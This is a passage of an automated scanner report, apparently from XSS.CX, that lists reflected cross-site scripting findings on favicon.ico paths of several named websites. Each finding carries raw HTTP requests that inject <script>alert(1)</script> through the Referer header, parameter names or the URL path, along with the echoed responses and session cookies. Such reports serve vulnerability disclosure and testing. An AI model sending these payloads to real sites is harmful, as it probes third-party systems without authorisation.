Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990
Referer: http://www.google.com/search?hl=en&q=7db98<script>alert(1)</script>5eea73835cc

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:27:09 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 1322

<div id="404container" class="error404">
<h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>


<p>It looks like you've requested a page that is cu
...[SNIP]...
</script>5eea73835cc'>http://www.google.com/search?hl=en&q=7db98<script>alert(1)</script>5eea73835cc</a>
...[SNIP]...

3.194. https://www.salsalabs.com/favicon.ico [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.salsalabs.com
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 889b4'><script>alert(1)</script>d9052bed70a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
Host: www.salsalabs.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990
Referer: http://www.google.com/search?hl=en&q=889b4'><script>alert(1)</script>d9052bed70a

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:27:08 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 1326

<div id="404container" class="error404">
<h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>


<p>It looks like you've requested a page that is cu
...[SNIP]...
<a href='http://www.google.com/search?hl=en&q=889b4'><script>alert(1)</script>d9052bed70a'>
...[SNIP]...

3.195. http://www.wiredforchange.com/favicon.ico [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wiredforchange.com
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload db55a<script>alert(1)</script>474f814857b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wiredforchange.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=db55a<script>alert(1)</script>474f814857b

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:19:18 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Set-Cookie: JSESSIONID=8D44C58D1CB471017C4BC3347397E4EA-n2; Path=/
Set-Cookie: SRV=web8; path=/
Content-Length: 1322

<div id="404container" class="error404">
<h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>


<p>It looks like you've requested a page that is cu
...[SNIP]...
</script>474f814857b'>http://www.google.com/search?hl=en&q=db55a<script>alert(1)</script>474f814857b</a>
...[SNIP]...

3.196. http://www.wiredforchange.com/favicon.ico [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wiredforchange.com
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d3385'><script>alert(1)</script>af1a8e2a429 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wiredforchange.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=d3385'><script>alert(1)</script>af1a8e2a429

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:19:18 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Set-Cookie: JSESSIONID=1CCA72982385ACE3BA9F512B75E4F7A4-n2; Path=/
Set-Cookie: SRV=web6; path=/
Content-Length: 1326

<div id="404container" class="error404">
<h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>


<p>It looks like you've requested a page that is cu
...[SNIP]...
<a href='http://www.google.com/search?hl=en&q=d3385'><script>alert(1)</script>af1a8e2a429'>
...[SNIP]...

3.197. http://www.force.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.force.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ebaef<script>alert(1)</script>ea50eb48de3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?ebaef<script>alert(1)</script>ea50eb48de3=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.force.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: http://www.salesforce.com/platform?ebaef<script>alert(1)</script>ea50eb48de3=1
Date: Fri, 22 Apr 2011 15:10:29 GMT
Content-Length: 193

The URL has moved to <a href="http://www.salesforce.com/platform?ebaef<script>alert(1)</script>ea50eb48de3=1">http://www.salesforce.com/platform?ebaef<script>alert(1)</script>ea50eb48de3=1</a>

3.198. http://www.force.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.force.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9e1f"><script>alert(1)</script>ca65c1d65e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?e9e1f"><script>alert(1)</script>ca65c1d65e=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.force.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: http://www.salesforce.com/platform?e9e1f"><script>alert(1)</script>ca65c1d65e=1
Date: Fri, 22 Apr 2011 15:10:28 GMT
Content-Length: 195

The URL has moved to <a href="http://www.salesforce.com/platform?e9e1f"><script>alert(1)</script>ca65c1d65e=1">http://www.salesforce.com/platform?e9e1f"><script>alert(1)</script>ca65c1d65e=1</a>

3.199. http://www.mrnumber.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mrnumber.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7e75d<script>alert(1)</script>165d6b47824 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico7e75d<script>alert(1)</script>165d6b47824 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrnumber.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 Found
Location: http://mrnumber.com/favicon.ico7e75d<script>alert(1)</script>165d6b47824
Content-Type: text/html
Content-Length: 262

<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.ico7e75d<script>alert(1)</script>165d6b47824">http://mrnumber.com/favicon.ico7e75d<script>alert(1)</script>165d6b47824</a>
...[SNIP]...

3.200. http://www.mrnumber.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mrnumber.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7e06"><script>alert(1)</script>1c75dad300f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.icoc7e06"><script>alert(1)</script>1c75dad300f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrnumber.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 Found
Location: http://mrnumber.com/favicon.icoc7e06"><script>alert(1)</script>1c75dad300f
Content-Type: text/html
Content-Length: 266

<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.icoc7e06"><script>alert(1)</script>1c75dad300f">http://mrnumber.com/favicon.ic
...[SNIP]...

3.201. http://www.mrnumber.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mrnumber.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86bd8"><script>alert(1)</script>35e978e613 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?86bd8"><script>alert(1)</script>35e978e613=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrnumber.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 Found
Location: http://mrnumber.com/favicon.ico?86bd8"><script>alert(1)</script>35e978e613=1
Content-Type: text/html
Content-Length: 270

<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.ico?86bd8"><script>alert(1)</script>35e978e613=1">http://mrnumber.com/favicon.
...[SNIP]...

3.202. http://www.mrnumber.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mrnumber.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 193b8<script>alert(1)</script>9fa070849 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?193b8<script>alert(1)</script>9fa070849=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrnumber.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 Found
Location: http://mrnumber.com/favicon.ico?193b8<script>alert(1)</script>9fa070849=1
Content-Type: text/html
Content-Length: 264

<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.ico?193b8<script>alert(1)</script>9fa070849=1">http://mrnumber.com/favicon.ico?193b8<script>alert(1)</script>9fa070849=1</a>
...[SNIP]...

Report generated by XSS.CX at Fri Apr 22 23:36:39 CDT 2011.